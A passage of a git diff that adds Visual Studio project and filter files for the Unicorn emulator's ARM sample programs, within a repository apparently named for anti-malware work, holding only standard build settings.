<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj.filters new file mode 100644 index 0000000..76c03db --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm/sample_arm.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj new file mode 100644 index 0000000..d61b4ae --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{04DC0E3A-F247-45C2-AE27-8DE7493AA43B}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_arm64</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj.filters new file mode 100644 index 0000000..1be43ac --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64/sample_arm64.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj new file mode 100644 index 0000000..b55c3f4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj @@ -0,0 +1,176 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{1A42A5E3-82A7-4EE4-B7D2-8265B147F124}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_arm64eb</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;__i386__</PreprocessorDefinitions> + <AdditionalIncludeDirectories>../../../include</AdditionalIncludeDirectories> + <ExceptionHandling>false</ExceptionHandling> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <AdditionalLibraryDirectories>$(SolutionDir)$(Platform)\$(Configuration)\</AdditionalLibraryDirectories> + <AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64eb.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj.filters new file mode 100644 index 0000000..a5cdd84 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_arm64eb/sample_arm64eb.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\sample_arm64eb.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj new file mode 100644 index 0000000..74d6844 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/sample_armeb/sample_armeb.vcxproj @@ -0,0 +1,174 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{1945F27B-ABB3-47F9-9268-A42F73C8B992}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sample_armeb</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + 